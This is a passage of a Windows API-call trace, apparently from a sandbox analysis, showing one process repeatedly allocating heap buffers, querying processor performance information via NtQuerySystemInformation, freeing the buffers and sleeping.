[0222.717] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0222.718] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0222.718] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0222.718] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0222.718] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0222.718] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0222.718] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0222.719] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0222.719] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0222.720] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0222.720] Sleep (dwMilliseconds=0x110) [0222.736] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0222.736] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0222.737] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0222.737] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0222.737] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0222.737] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0222.737] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0222.737] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0222.738] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0222.738] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0222.739] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0222.739] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0222.739] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0222.740] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0222.740] Sleep (dwMilliseconds=0x110) [0222.748] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0222.748] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0222.749] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0222.749] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0222.749] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0222.749] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0222.749] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0222.749] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0222.750] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0222.750] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0222.750] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0222.750] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0222.750] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0222.750] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0222.750] Sleep (dwMilliseconds=0x110) [0222.764] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0222.764] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0222.764] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0222.764] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0222.764] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0222.765] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0222.765] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0222.765] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0222.766] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0222.766] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0222.766] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0222.766] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0222.766] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0222.767] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0222.767] Sleep (dwMilliseconds=0x110) [0222.779] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0222.779] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0222.780] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0222.780] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0222.780] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0222.780] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0222.780] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0222.780] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0222.781] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0222.781] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0222.781] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0222.781] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0222.781] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0222.782] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0222.782] Sleep (dwMilliseconds=0x110) [0222.798] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0222.798] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0222.799] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0222.799] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0222.799] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0222.799] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0222.799] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0222.799] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0222.800] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0222.800] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0222.800] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0222.801] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0222.801] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0222.801] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0222.801] Sleep (dwMilliseconds=0x110) [0222.815] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0222.815] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0222.816] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0222.816] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0222.816] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0222.817] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0222.817] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0222.817] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0222.817] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0222.817] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0222.817] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0222.818] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0222.818] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0222.818] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0222.818] Sleep (dwMilliseconds=0x110) [0222.826] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0222.826] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0222.827] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0222.827] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0222.827] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0222.828] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0222.828] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0222.828] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0222.828] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0222.828] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0222.828] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0222.829] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0222.829] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0222.829] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0222.830] Sleep (dwMilliseconds=0x110) [0222.845] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0222.845] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0222.846] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0222.846] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0222.846] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0222.847] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0222.847] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0222.847] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0222.847] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0222.847] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0222.847] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0222.848] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0222.848] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0222.849] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0222.849] Sleep (dwMilliseconds=0x110) [0222.860] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0222.860] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0222.860] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0222.860] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0222.860] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0222.861] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0222.861] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0222.861] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0222.862] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0222.862] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0222.862] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0222.862] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0222.862] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0222.863] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0222.863] Sleep (dwMilliseconds=0x110) [0222.881] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0222.881] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0222.881] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0222.882] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0222.882] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0222.882] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0222.882] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0222.882] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0222.883] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0222.883] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0222.883] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0222.884] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0222.884] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0222.884] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0222.884] Sleep (dwMilliseconds=0x110) [0222.904] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0222.904] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0222.905] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0222.905] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0222.905] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0222.905] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0222.905] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0222.905] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0222.905] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0222.905] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0222.905] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0222.906] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0222.906] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0222.906] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0222.906] Sleep (dwMilliseconds=0x110) [0222.929] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0222.929] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0222.930] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0222.930] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0222.930] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0222.930] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0222.931] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0222.931] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0222.931] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0222.931] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0222.931] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0222.932] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0222.932] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0222.933] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0222.933] Sleep (dwMilliseconds=0x110) [0222.935] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0222.935] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0222.935] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0222.936] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0222.936] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0222.936] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0222.936] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0222.936] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0222.937] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0222.937] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0222.937] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0222.938] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0222.938] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0222.939] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0222.939] Sleep (dwMilliseconds=0x110) [0222.951] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0222.951] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, 